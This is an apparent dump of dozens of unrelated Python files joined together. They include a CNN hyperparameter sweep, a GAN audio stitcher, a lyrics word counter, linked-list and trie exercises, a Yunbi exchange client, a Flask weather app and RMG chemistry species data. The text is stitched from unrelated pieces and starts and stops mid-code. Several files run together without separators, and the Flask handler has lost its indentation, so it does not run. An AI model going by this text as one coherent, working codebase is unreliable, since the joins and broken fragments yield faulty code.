        return {'type': 'conv', 'filters': n_filters, 'ksize': ksize, 'stride': [1, 1]}

    def pool():
        return {'type': 'max_pool', 'ksize': [2, 2], 'stride': [2, 2]}

    head = [
        {'type': 'flatten'},
        {'type': 'fc', 'units': 128},
        {'type': 'dropout'},
        {'type': 'relu'},
        {'type': 'fc', 'units': 43},
    ]
    deep = [conv(filters[0]), pool(), {'type': 'relu'},
            conv(filters[1]), pool(), {'type': 'relu'}] + head
    shallow = [conv(filters[0]), {'type': 'relu'}, pool()] + head
    return (deep, shallow)[index]
hyperparameters = [data_augmentation, batch_sizes, dropout_keep_prob, filters, ksize, config]
# Get every permutation of hyperparameters
experiments = list(itertools.product(*hyperparameters))
input_size = X_train[0].shape
num_labels = max(y_train) + 1
# stats will contain the statistics from the experiments that are ran
# hyperparameters, total time, accuracy
stats = pd.read_csv('experiment_stats.csv')
stat_labels = [
    'elapsed_time_to_train',
    'validation_accuracy',
    'data_augmented',
    'batch_size',
    'dropout_keep_probability',
    'conv_filters',
    'conv_ksize',
    'architecture'
]
tf.logging.set_verbosity(tf.logging.ERROR)
# seeding the shuffle in case the computer crashes and we need to restart from where we left off
experiments = shuffle(experiments, random_state=99)
# NOTE(review): resumes after the first 400 experiments -- adjust when restarting
experiments = experiments[400:]
print("{} experiments about to run.".format(len(experiments)))
for experiment in experiments:
    # NOTE(review): this rebinds the module-level names `augment`, `filters`,
    # `ksize` and `config` on the first iteration -- intentional but fragile
    augment, batch_size, keep_prob, filters, ksize, config = experiment
    start_time = time.time()
    network = NN(epochs=5, batch_size=batch_size, learning_rate=0.001)
    # only include the augmented data when this experiment asks for it
    features = np.concatenate([X_train, aug_X]) if augment == 'True' else X_train
    labels = np.concatenate([y_train, aug_y]) if augment == 'True' else y_train
    network.add_train_data(features, labels)
    network.add_test_data(X_test, y_test)
    network.add_validation_data(X_valid, y_valid)
    network.add_configuration(create_network_config(config, filters, ksize), input_size=input_size)
    network.build(num_labels=num_labels)
    print("Training model with hyperparameters: augmented: {}, batch_size: {}, keep_prob: {}, filters: {}, ksize: {}, config: {}".format(augment, batch_size, keep_prob, filters, ksize, network.get_string()))
    validation_accuracy = network.train(keep_prob=keep_prob)
    end_time = time.time()
    stat_values = [end_time - start_time, validation_accuracy, augment, batch_size, keep_prob, filters, ksize, network.get_string()]
    stat_entry = pd.Series(stat_values, index=stat_labels)
    # NOTE(review): DataFrame.append is removed in pandas >= 2.0 -- presumably
    # fine for the pandas version pinned here; rewrite to pd.concat if upgrading
    stats = stats.append(stat_entry, ignore_index=True)
    # rewrite the CSV after every experiment so a crash loses at most one row
    stats.to_csv('experiment_stats.csv', index = None, header=True)
|
from AudioFileManager import *
import numpy as np
# Stitch random GAN-output audio snippets into one long wav file.
sequenceLength = 4775*2      # samples taken from each snippet
nSnippets = 256              # snippets per sequence
minEpoch = 61000             # first GAN checkpoint epoch to sample from
nEpochs = 800
epochStep = 10
snippetsPerEpoch = 5         # files available per checkpoint
nOverlays = 1                # how many shifted sequences to mix together
nRepeats = 4                 # times each snippet is repeated back-to-back
def GetSequence():
    """Concatenate nSnippets random GAN snippets (each repeated nRepeats times)."""
    output = np.zeros(sequenceLength*nSnippets*nRepeats)
    for i in range(nSnippets):
        # pick a random checkpoint epoch and snippet index
        epoch = minEpoch + np.random.randint(0, nEpochs)*epochStep
        k = np.random.randint(0, snippetsPerEpoch)
        for j in range(nRepeats):
            rate, audio = ReadWavAsMono("GANOutputs/normalized{}.{}.wav".format(epoch, k))
            output[i*nRepeats*sequenceLength+j*sequenceLength:i*nRepeats*sequenceLength+j*sequenceLength+sequenceLength] = audio[0:sequenceLength]
    return output
output = np.zeros(sequenceLength*nSnippets*nRepeats)
# mix nOverlays sequences, each shifted by one snippet length
for i in range(nOverlays):
    offset = sequenceLength * i
    output[offset:-1] = output[offset:-1] + GetSequence()[offset:-1]/nOverlays
WriteMonoWav("randomSequence.wav", output, 8000)
|
from suds.client import Client
import re
import urllib2
import json
# Stop-word list excluded from the word-frequency table (lower-cased forms).
common_words = ['i','you','no','yes','the','it','a',"it's",'its','on','and','my','your','in',"you're","i'm",'is','was','but','what','had','oh','for',
                'yeah','yea','me','na','all','to','do','be','this','gonna','know','of','come','like','so','way','just','said','would','now','we','that',
                'got','when','dont','im','are','id']
# Returns list of lyrics split into words
def getLyrics(artist,name):
    """Fetch lyrics from the LyricWiki SOAP API; return a word list, or None."""
    url = "http://lyrics.wikia.com/server.php?wsdl"
    client = Client(url)
    if artist and name:
        resp = client.service.getSong(artist=artist,song=name)
        if "Not found" not in resp.lyrics:
            lyrics = resp.lyrics
            # strip punctuation, short bracketed annotations and "x2"-style repeat markers
            lyrics = re.sub(r'[\(\)\,\.\?\!\"|\[.{0,2}\]|(x\d)]',"",lyrics)
            return lyrics.split()
    return None
# Returns dict of artist/song combos for specified year
def getYear(year,bbkey):
    """Query the Billboard chart API (Python 2 urllib2) for one year; {artist: [songs]}."""
    url = "http://api.billboard.com/apisvc/chart/v1/list?id=379&format=json&count=50&sdate=" + year + "-01-01&edate=" + year + "-12-31&api_key=" + bbkey
    req = urllib2.Request(url)
    doc = urllib2.urlopen(req)
    content = str(doc.read())
    songMap = dict()
    jsobj = json.loads(content)
    if jsobj:
        results = jsobj["searchResults"]
        for entry in results["chartItem"]:
            name = entry["song"]
            artist = entry["artist"]
            if name and artist:
                print(artist + ' - ' + name)
                # EAFP: first song for an artist creates the list
                try:
                    if name not in songMap[artist]:
                        songMap[artist].append(name)
                except KeyError:
                    songMap[artist] = [name]
        return songMap
    else:
        return None
# Build frequency table of words
# Build frequency table of words
def buildFreqTable(songlist):
    """Count occurrences of each non-stop-word across all songs.

    songlist -- iterable of word lists (one per song).
    Returns {utf-8-encoded lower-cased word: count}.
    """
    freqTable = dict()
    for song in songlist:
        for word in song:
            if not word:
                continue
            word = word.lower().encode("utf-8")
            if word in common_words:
                continue
            freqTable[word] = freqTable.get(word, 0) + 1
    return freqTable
|
from L8.board.board import Board
class TicTacToeBoard(Board):
    """A 3x3 tic-tac-toe board; empty cells are stored as None."""

    def __init__(self):
        super().__init__()
        self.init_board()

    def init_board(self):
        # fresh 3x3 grid with no tokens placed
        self.current_state = [[None] * 3 for _ in range(3)]

    def __str__(self) -> str:
        """
        This will give us a board formatted like this:
         X | O | X
         X | X | O
         X | O | O
        :return: a str representation of the current board
        """
        def render_cell(token):
            # three blank spaces for an empty cell, otherwise center the token in width 3
            return "{:3}".format("") if token is None else "{:^3}".format(str(token))

        return "\n".join(
            "|".join(render_cell(token) for token in row)
            for row in self.current_state
        )
|
class Node:
    """A singly-linked-list node holding `data` and a reference to the next node."""

    def __init__(self, data=None, next=None):
        self.data = data
        self.next = next

    def __str__(self):
        # render the node as its payload
        return "{}".format(self.data)
def print_node(node):
    # Visitor for traverse(): print one node (Python 2 print statement).
    print node
def traverse(node, visit):
    # Walk the list starting at `node`, applying `visit` to every node.
    print "List:"
    while node:
        visit(node)
        node = node.next
def remove_head(node):
    """Detach the first node; return (new_head, removed_data).

    Raises ValueError on an empty list.
    """
    if node is None:
        raise ValueError
    removed = node.data
    return node.next, removed
def remove_tail(node):
    """Detach the last node; return (new_head, removed_data).

    Raises ValueError on an empty list; a single-element list becomes empty.
    """
    if node is None:
        raise ValueError
    if node.next is None:
        return None, node.data
    head = node
    # advance until `prev` is the second-to-last node
    prev = node
    while prev.next.next is not None:
        prev = prev.next
    removed = prev.next.data
    prev.next = None
    return head, removed
# Build the list 6 -> 5 -> 4 -> 3 -> 2 -> 1 by pushing onto the head.
head1 = None
head1 = Node(1, head1)
head1 = Node(2, head1)
head1 = Node(3, head1)
head1 = Node(4, head1)
head1 = Node(5, head1)
head1 = Node(6, head1)
# Remove the tail twice, then the head twice, printing the list after each step.
traverse(head1, print_node)
head1, data = remove_tail(head1)
traverse(head1, print_node)
head1, data = remove_tail(head1)
traverse(head1, print_node)
head1, data = remove_head(head1)
traverse(head1, print_node)
head1, data = remove_head(head1)
traverse(head1, print_node)
|
# -*- coding: utf-8 -*-
import numpy as np
from hypertools.tools.normalize import normalize
from hypertools.plot.plot import plot
# Two well-separated 3D Gaussian clusters shared by every test below.
cluster1 = np.random.multivariate_normal(np.zeros(3), np.eye(3), size=100)
cluster2 = np.random.multivariate_normal(np.zeros(3)+100, np.eye(3), size=100)
data = [cluster1, cluster2]
def test_normalize_returns_list():
    # normalize should preserve the list-of-arrays container type
    assert type(normalize(data)) is list
def test_normalize_across():
    # 'across': the stacked data should be zero-mean per column
    norm_data = normalize(data, normalize='across')
    assert np.allclose(np.mean(np.vstack(norm_data),axis=0),0)
def test_normalize_within():
    # 'within': each array individually zero-mean per column
    norm_data = normalize(data, normalize='within')
    assert np.allclose([np.mean(i,axis=0) for i in norm_data],0)
def test_normalize_row():
    # 'row': every row should be zero-mean
    norm_data = normalize(data, normalize='row')
    assert np.allclose(np.mean(np.vstack(norm_data), axis=1),0)
def test_normalize_geo():
    # normalize should also accept the geometry object returned by plot()
    geo = plot(data, show=False)
    norm_data = normalize(geo, normalize='row')
    assert np.allclose(np.mean(np.vstack(norm_data), axis=1),0)
|
# Demonstration of list.remove: it mutates in place, returns None, and only
# removes the FIRST matching element.
names = ['Joe', 'Kim', 'Jane', 'Bob', 'Kim']
print(names) # ['Joe', 'Kim', 'Jane', 'Bob', 'Kim']
print(names.remove('Kim')) # None
print(names) # ['Joe', 'Jane', 'Bob', 'Kim']
# Removing a missing element raises ValueError (shown below on purpose).
print(names.remove('George'))
# Traceback (most recent call last):
#   File "examples/lists/remove.py", line 9, in <module>
#     print(names.remove('George')) # None
# ValueError: list.remove(x): x not in list
|
class Solution:
    # @return a string
    def convert(self, s, nRows):
        """ZigZag conversion: write s down-and-up across nRows rows, read row by row."""
        if nRows == 1:
            return s
        # simulate the zigzag walk, bucketing characters per row
        rows = [[] for _ in range(nRows)]
        row = 0
        step = 1
        for ch in s:
            rows[row].append(ch)
            # bounce at the top and bottom rows
            if row == 0:
                step = 1
            elif row == nRows - 1:
                step = -1
            row += step
        return ''.join(''.join(bucket) for bucket in rows)
if __name__ == '__main__':
    test = Solution()
    # Python 2 print statement; with 3 rows and a 3-char input the output is 'ABC'
    print test.convert('ABC', 3)
    # keep the console window open (Python 2)
    raw_input()
import sys
from collections import defaultdict
from itertools import count
class Trie(object):
    """Prefix trie over `words` supporting "does any word prefix this text?" queries.

    Nodes are integers; edges live in self._trie as {node: [(child, letter), ...]}.
    Word ends are tracked explicitly in self._terminals, fixing two defects of
    the original leaf-only test: (1) a pattern that is a prefix of another
    pattern was never matched, and (2) querying an empty trie raised KeyError.
    """

    def __init__(self, words):
        self._node_counter = count(0)
        self._root = next(self._node_counter)
        self._trie = defaultdict(list)
        self._terminals = set()  # nodes at which an inserted word ends
        self._add_words_to_trie(words)

    def _add_words_to_trie(self, words):
        for word in words:
            self._add_to_trie(word)
        # freeze: plain dict so lookups no longer create empty buckets
        self._trie = dict(self._trie)

    def _add_to_trie(self, word):
        current_node = self._root
        for letter in word:
            node = self._get_neighbour_with_given_label(current_node, letter)
            if node is not None:
                current_node = node
            else:
                next_node = next(self._node_counter)
                self._trie[current_node].append((next_node, letter))
                current_node = next_node
        # mark the end of this word so prefixes of longer words still match
        self._terminals.add(current_node)

    def _get_neighbour_with_given_label(self, current_node, letter):
        # .get avoids KeyError on leaves (and on the root of an empty trie)
        for node, label in self._trie.get(current_node, []):
            if label == letter:
                return node
        return None

    def _is_word_end(self, node):
        return node in self._terminals

    def does_text_match_with_pattern(self, text):
        """Return True iff some inserted word is a prefix of `text`."""
        current_node = self._root
        for letter in text:
            next_node = self._get_neighbour_with_given_label(current_node, letter)
            if next_node is None:
                return False
            if self._is_word_end(next_node):
                return True
            current_node = next_node
        return False
def multiple_pattern_matching(text, patterns):
    """Return every index i such that some pattern occurs in text starting at i."""
    trie = Trie(patterns)
    return [ix for ix in range(len(text)) if trie.does_text_match_with_pattern(text[ix:])]
def main():
    """Read stdin (line 1: text, line 2: n, next n lines: patterns) and print match indices."""
    data = sys.stdin.read().splitlines()
    text = data[0]
    n = int(data[1])
    patterns = data[2:2+n]
    indices_of_matching_patterns = multiple_pattern_matching(text, patterns)
    # space-separated starting indices, in increasing order
    print(" ".join([str(elem) for elem in indices_of_matching_patterns]))
if __name__ == "__main__":
    main()
|
from pox.core import core
import pox.openflow.libopenflow_01 as of
import pox.openflow.nicira as nx
from utils import *
import time
from pox.lib.addresses import EthAddr, IPAddr
from pox.lib.packet.lldp import lldp, chassis_id, port_id, ttl, end_tlv
from pox.lib.packet.ethernet import ethernet
from pox.lib.packet.arp import arp
from pox.lib.packet.ipv4 import ipv4
from pox.lib.packet.icmp import echo, unreach, icmp
import struct
# Location of the controller configuration file on the Mininet VM.
CONFIG_FILENAME = '/home/mininet/config'
|
# -*- coding: cp936 -*-
import random as r
class Fish:
    """A fish with a random starting position on a 10x10 grid.

    Bug fix: the original defined `_init_` (single underscores), which Python
    never calls, so instances were created without x/y and move() crashed with
    AttributeError. Renamed to the real constructor `__init__`.
    """
    def __init__(self):
        self.x = r.randint(0,10)
        self.y = r.randint(0,10)
    def move(self):
        """Swim one step to the left and report the position."""
        self.x -=1
        print ("我的位置是",self.x,self.y)
class Godfish(Fish):
    pass
class crap(Fish):
    pass
class Salmon(Fish):
    pass
class Shark(Fish):
    """A fish that can eat exactly once before it is full."""
    def __init__(self):
        # same `_init_` bug fixed; also initialize the inherited position
        # (Fish.__init__ works on both old- and new-style classes)
        Fish.__init__(self)
        self.hungry = True
    def eat(self):
        """Eat if hungry; otherwise complain about being full."""
        if self.hungry:
            print("吃货的梦想")
            self.hungry = False
        else:
            print("太撑了,吃不下")
|
from django.conf.urls import patterns, include, url
from django.views.generic import RedirectView
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
# NOTE(review): `patterns()` is the pre-Django-1.10 URLconf style, kept as-is.
urlpatterns = patterns('',
    url(
        r'^games/tic-tac-toe/',
        include('apps.tic_tac_toe.urls', namespace='tic_tac_toe'),
    ),
    # Uncomment the admin/doc line below to enable admin documentation:
    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
    # Uncomment the next line to enable the admin:
    # url(r'^admin/', include(admin.site.urls)),
)
# Redirect the site root to the tic-tac-toe app.
urlpatterns += patterns('',
    (r'^$', RedirectView.as_view(url='/games/tic-tac-toe/')),
)
|
import cx_Oracle
class connect:
    """Small helper that opens and closes cx_Oracle database connections."""

    def getConnection(self):
        """Return a new connection, or None if connecting fails.

        Bug fixes: the bare `except:` (which also swallowed SystemExit and
        KeyboardInterrupt) is narrowed to `except Exception`, and the Python
        2-only print statements are parenthesized so they run on 2 and 3.
        The best-effort contract (print and return None on failure) is kept.
        """
        try:
            connection = cx_Oracle.connect('')
            #print("Connected to domain successfully")
            return connection
        except Exception:
            print("There was an error while connecting to domain!")
            return None
    #cur.execute('select * from prsnl p where p.name_full_formatted = \'Boregowda , Sachin\'')

    def disconnect(self, connection, cursor):
        """Close the cursor first, then the connection."""
        cursor.close()
        connection.close()
        #print("Connection to database was successfully closed!")
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import urllib2
import utils.gmtTimeUtil as gmtTimeUtil
from yunbi.client import Client, get_api_path
from yunbi.conf import ACCESS_KEY, SECRET_KEY
import sys
reload(sys)
sys.setdefaultencoding('utf8')
class YunUtil():
    """Thin Python 2 wrapper around the Yunbi exchange REST client."""
    def __init__(self):
        # self.access_key = access_key
        self.client = Client(access_key=ACCESS_KEY, secret_key=SECRET_KEY)
        # print "yunUtil.init()"
    def getMebersInfo(self):
        # Fetch account info; None on any API error.
        # NOTE(review): method name is misspelled ("Mebers") but kept for callers.
        try:
            yun_info = self.client.get(get_api_path('members'))
            return yun_info
        except Exception, e:
            print e
            return None
    # Get the remaining balance of `coin` in the account
    def getCurrency(self, coin):
        yun_info = self.client.get(get_api_path('members'))
        # print yun_info
        # cny, zec, eth = 0, 0, 0
        balance = 0.0
        accounts = yun_info['accounts']
        for account in accounts:
            if account['currency'] == coin:
                balance = float(account['balance'])
        return balance
    # Count my open (state == 'wait') orders for `coin`
    def getMyOrderCount(self, coin):
        orders = self.client.get(get_api_path('orders'), {'market': coin+'cny'})
        # print orders
        count = 0
        off_sec = 0
        for order in orders :
            if order['state'] == 'wait' :
                count = count + 1
                created_at = order['created_at']
                # print "gmt_tm--->"+created_at
                off_sec = gmtTimeUtil.get_off_by_utc_str(created_at)
                # print "off_sec--->%d" % off_sec
                # an order waiting more than 10 minutes: return the sentinel 600
                # to signal that manual handling is needed
                if off_sec > 600 :
                    return 600
        return count
    # Get the best usable (volume, price) from the order book.
    # asks = sell side (remaining_volume / price); bids = buy side
    def getMarketInfo(self, buyOrSell, coin, max_volume, min_volume):
        order_book = self.client.get(get_api_path('order_book'), params={'market': coin+'cny'})
        # print order_book
        side = ''
        if 'buy' == buyOrSell :
            side = 'bids'
        if 'sell' == buyOrSell :
            side = 'asks'
        asks = order_book[side]
        for ask_order in asks:
            remaining_volume = float(ask_order['remaining_volume'])
            price = float(ask_order['price'])
            # volume limits: skip entries below min_volume, clamp to max_volume
            if remaining_volume >= min_volume:
                if remaining_volume > max_volume :
                    remaining_volume = max_volume
                return remaining_volume, price
        return 0.0, 0.0
    # Create an order, e.g. sell 10 dogecoins at price 0.01:
    # params = {'market': 'dogcny', 'side': 'sell', 'volume': 10, 'price': 0.01}
    # res = client.post(get_api_path('orders'), params)
    def createOrder(self, coin, buyOrSell, price, volume):
        # Returns the new order id, or 0 on failure.
        # print coin, buyOrSell, price, volume
        try :
            params = {'market': coin+'cny', 'side': buyOrSell, 'volume': volume, 'price': price}
            res = self.client.post(get_api_path('orders'), params)
            # print 'res', res
            if res and res['id'] > 1 :
                return res['id']
        except Exception, e :
            print e
        return 0
    # Cancel all open orders
    def clearOrder(self):
        res = self.client.post(get_api_path('clear'))
        # print res
        return res
if __name__ == '__main__':
    print u"---", "====="
    # read parameters
    # path = get_api_path('members')
    # signature, query = YunUtil().client.auth.sign_params('GET',path, None)
    # print "signature--->%s" %( signature )
    # print "query--->%s" %( query )
    # get member info
    # print u'云币网账户信息: %d(cny)' % (YunUtil().getCurrency('cny'))
    # print "最少交易量:%f" % (min_operate_num)
    # remaining_volume, price = YunUtil().getMarketInfo('sell', 'eth', 20, 1)
    # print '有效价格:%f 有效数量:%f ' % (price, remaining_volume)
    # print u'云币网账户信息: %s(cny)' % (YunUtil().getMyOrderCount('zec'))
    # print time.strftime("%Y-%m-%d %H:%M:%S", time.time())
    # print u'创建订单: %s' % (YunUtil().createOrder('zec', 'buy', 100, 1.00))
    # print u'创建订单: %s' % (YunUtil().createOrder('eos', 'sell', 14, 1.00))
    # Cancel every open order when run directly.
    YunUtil().clearOrder()
|
# Brazilian military enlistment calculator: given a birth year, report whether
# the user is before, past, or exactly at enlistment age (18).
# Fixes user-facing typos in the messages: 'valta' -> 'falta', 'passol' -> 'passou'.
from datetime import date
atual = date.today().year
ano = int(input('informe o ano de nascimento: '))
idade = atual - ano
if idade < 18:
    # years still to go until enlistment
    tempo = 18 - idade
    print('ainda não está no tempo de se alistar!\nfalta {} ano(s)!'.format(tempo))
    saldo = atual + tempo
    print('Seu alistamento será em {}'.format(saldo))
elif idade > 18:
    # years since the enlistment age was passed
    tempo = idade - 18
    print('já passou do tempo!\n{} ano(s) se passou'.format(tempo))
    saldo = atual - tempo
    print('Seu alistamento foi em {}'.format(saldo))
else:
    print('está na hora!!!')
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 12 20:26:26 2016
@author: rossm
Introduction to Computation and Programming Using Python
Finger Exercise 3.2
Summing Input Strings
"""
# Sum a fixed list of reals.
# Fixes: the accumulator shadowed the builtin `sum`, and the Python 2-only
# `print sum` statement is replaced with a print() call that runs on 2 and 3.
counter = 0
total = 0
reals = [1.23,2.4,3.123]
# iterate the values directly instead of indexing through a manual counter
for value in reals:
    total = total + value
    counter = counter + 1
print(total)
# -*- coding:utf-8 -*-
from bs4 import BeautifulSoup
# Load index.html and build the soup object
soup = BeautifulSoup(open("index.html"),"lxml")
# Note: bs4 exposes tags directly as soup attributes; this checks whether the
# document CONTAINS a tag. To find all matching tags, use a DOM query
# (find_all) instead -- attribute access only returns the first match.
# 1. Get a tag object
# the <title> tag
print(soup.title) #<title>Xpath测试</title>
# 2. Work with tag attributes
print ('-*-'*10)
print(soup.h1.attrs)
print(soup.h1.attrs["id"])
print(soup.h1.attrs.get("id")) #title
print(soup.p.attrs.get("class")) #None
# direct tag access returns only the FIRST matching tag
print(soup.h2.attrs)#{'id': 'title2'}
# 3. Tag content -- .string returns the tag's text
print(soup.h2.string) #
|
#!/bin/python
def AllDigitsFound(d):
    """Return True when every flag in `d` is set (all ten digits seen)."""
    return all(d)
def SplitDigits(n):
    """Return the decimal digits of n, least-significant first (empty for 0)."""
    result=[]
    while n != 0:
        result.append(n%10)
        # floor division: the original `/=` produces floats on Python 3
        # and never terminates correctly; `//=` is identical on Python 2
        n//=10
    return result
def CountSheep(n):
    """GCJ "Counting Sheep": last multiple of n at which all digits 0-9 have
    appeared, or the string "INSOMNIA" if they never do (capped at 100000
    multiples as a safety bound; n == 0 is handled by the caller)."""
    digits=[False]*10
    count = 1
    while not AllDigitsFound(digits) and count < 100000:
        num = n * count
        for d in SplitDigits(num):
            digits[d]=True
        # print digits
        count+=1
    if AllDigitsFound(digits):
        return num
    else:
        return "INSOMNIA"
# Python 2 driver: first line = number of test cases, then one N per line.
t = int(raw_input())
for i in xrange(1, t + 1):
    n = int(raw_input())
    if n == 0:
        # counting by zero never reveals any digits
        o = "INSOMNIA"
    else:
        o = CountSheep(n)
    print "Case #{}: {}".format(i, o)
from sys import path; path += [".", ".."] # hacky...
from utils import *
if __name__ == "__main__":
    # Cryptopals set 1 challenge 4: find the one line that was single-byte-XOR'd.
    # NOTE(review): `dehex`, `load_data`, `xor`, `op`, `reduce` and `englishness`
    # presumably come from `from utils import *` -- confirm
    ciphertexts = map(dehex, load_data("4.txt").split("\n"))
    # try every possible 1-byte key against every ciphertext
    keyspace = list(range(0x100))
    plaintexts = reduce(op.add, [
        [xor(ct, [key]) for key in keyspace]
        for ct in ciphertexts
    ])
    # lowest `englishness` score == most English-like candidate
    best_plaintext = min(plaintexts, key=englishness) # I like this code
    message = best_plaintext.decode()
    assert(message == "Now that the party is jumping\n")
    print(message.strip())
|
# Generated by Django 3.0.3 on 2020-05-11 20:27
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds Alimentador.puntuacion/tipo and switches PagUsuario.foto to TextField."""
    dependencies = [
        ('miscosas', '0002_auto_20200507_0013'),
    ]
    operations = [
        # cumulative score for a feeder, starts at 0
        migrations.AddField(
            model_name='alimentador',
            name='puntuacion',
            field=models.IntegerField(default=0),
        ),
        # short type tag for a feeder
        migrations.AddField(
            model_name='alimentador',
            name='tipo',
            field=models.CharField(default='', max_length=10),
        ),
        migrations.AlterField(
            model_name='pagusuario',
            name='foto',
            field=models.TextField(default=''),
        ),
    ]
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
        """Merge two sorted linked lists by collecting every value, sorting,
        and rebuilding a fresh list (input nodes are not reused)."""
        values = []
        for head in (l1, l2):
            node = head
            while node:
                values.append(node.val)
                node = node.next
        values.sort()
        merged_head = None
        tail = None
        for v in values:
            fresh = ListNode(v)
            if merged_head is None:
                merged_head = fresh
                tail = fresh
            else:
                tail.next = fresh
                tail = fresh
        return merged_head
|
#Problem Statement: Perform table join by location of 2 shapefile
#Step 1: Load the shapefile
# (QGIS Python-console script: QgsVectorLayer/QgsProject/processing come from the QGIS runtime)
filepath="/home/abhishek/Desktop/M.Sc-GIS/data/natural_earth_vector/110m_cultural/ne_110m_populated_places.shp"
shp=QgsVectorLayer(filepath,"Pop","ogr")
QgsProject.instance().addMapLayer(shp)
filepath="/home/abhishek/Desktop/M.Sc-GIS/data/natural_earth_vector/10m_cultural/ne_10m_admin_0_countries.shp"
shp1=QgsVectorLayer(filepath,"countries","ogr")
QgsProject.instance().addMapLayer(shp1)
outpath="/home/abhishek/Desktop/joinloc.shp"
# Join the countries' SOVEREIGNT attribute onto the populated places.
# NOTE(review): PREDICATE [5] is a spatial-predicate code -- confirm it means
# "within" against the QGIS joinattributesbylocation documentation
params={'INPUT':shp,'JOIN':shp1,'PREDICATE':[5],'JOIN_FIELDS':['SOVEREIGNT'],
        'METHOD':0,'DISCARD_NONMATCHING':False,'OUTPUT':outpath}
processing.run("qgis:joinattributesbylocation",params)
|
#!/usr/bin/env python
import sys
import os
import csv
# Print the total size in bytes of all files under the directory given as argv[1].
# Fixes: Python 2-only `print` statement (now print(), valid on 2 and 3),
# "%s/%s" path building replaced with os.path.join (correct on every OS),
# and the loop variable no longer shadows the builtin `file`.
dir_name = sys.argv[1]
# get file list
file_list = []
for root, dirs, files in os.walk(dir_name, True):
    for name in files:
        file_list.append(os.path.join(root, name))
# get total file size
total_file_size = 0
for path in file_list:
    total_file_size += os.path.getsize(path)
print(total_file_size)
|
# Read "word1 word2 k" from stdin and print "yes" iff the two words differ
# in exactly k positions.
# Bug fix: the counter was initialized as `cc` but incremented/compared as `c`,
# which raised NameError on any differing input; it is now `cc` throughout.
ll=list(map(str,input().split()))
cc=0
for i in range(len(ll[0])):
    if(ll[0][i]!=ll[1][i]):
        cc+=1
bb=int(ll[2])
if(cc==bb):
    print("yes")
else:
    print("no")
|
from flask import Flask, render_template, request
import requests
import sys
import json
import datetime
API_key = "????" # create api key on https://openweathermap.org/api
app = Flask(__name__)
@app.route("/")
def index():
    # Landing page: renders the (empty) city search form.
    return render_template("index.html")
@app.route("/", methods=["POST"])
def add_city():
city_name = request.form["city_name"]
data = requests.get(f"http://api.openweathermap.org/data/2.5/weather?q={city_name}&units=metric&appid={API_key}")
datas = json.loads(data.text)
date = datetime.datetime.utcnow() + datetime.timedelta(seconds=datas['timezone'])
date_time = date.time().hour # set a background image according to the current city time
if date_time < 6:
background = "card evening-morning"
elif 6 < date_time < 18:
background = "card day"
elif 18 < date_time < 24:
background = "card night"
dict_with_weather_info = [{"degrees": datas["main"]["temp"], "state": datas["weather"][0]["main"],
"city": datas["name"]}]
return render_template("index.html", weathers=dict_with_weather_info, background=background)
# don't change the following way to run flask:
if __name__ == '__main__':
if len(sys.argv) > 1:
arg_host, arg_port = sys.argv[1].split(':')
app.run(host=arg_host, port=arg_port)
else:
app.run()
|
# NOTE(review): this and the following entries appear to be auto-generated
# RMG/Arkane-style species() definitions (vibrational/rotor modes plus
# NASA-polynomial thermochemistry); numeric data is left untouched.
# Species 'CCC([O])C([O])O(11392)' — thermo provenance is recorded in the NASA comment field.
species(
    label = 'CCC([O])C([O])O(11392)',
    structure = SMILES('CCC([O])C([O])O'),
    E0 = (-220.767,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,212.39,212.393,212.393,2800.92],'cm^-1')),
        HinderedRotor(inertia=(0.00373702,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.00373706,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.00373701,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.558829,'amu*angstrom^2'), symmetry=1, barrier=(17.8891,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 3,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.11935,0.0688283,-7.43642e-05,5.05808e-08,-1.50964e-11,-26453.3,28.8512], Tmin=(100,'K'), Tmax=(791.097,'K')), NASAPolynomial(coeffs=[6.9304,0.0394443,-1.86459e-05,3.62347e-09,-2.56237e-13,-27372.7,2.17834], Tmin=(791.097,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-220.767,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(340.893,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CC(C)OJ) + radical(CCOJ)"""),
)
# Species 'HOCHO(59)' (labelled HOCHO in its thermo entry) — thermo from the Klippenstein_Glarborg2016 library.
species(
    label = 'HOCHO(59)',
    structure = SMILES('O=CO'),
    E0 = (-389.211,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([3615,1277.5,1000,1051.41,1051.94,1052.55,2787.25,4000],'cm^-1')),
        HinderedRotor(inertia=(0.00861396,'amu*angstrom^2'), symmetry=1, barrier=(6.76824,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (46.0254,'amu'),
    collisionModel = TransportData(shapeIndex=2, epsilon=(4005.91,'J/mol'), sigma=(3.626,'angstroms'), dipoleMoment=(1.7,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""NOx2018"""),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
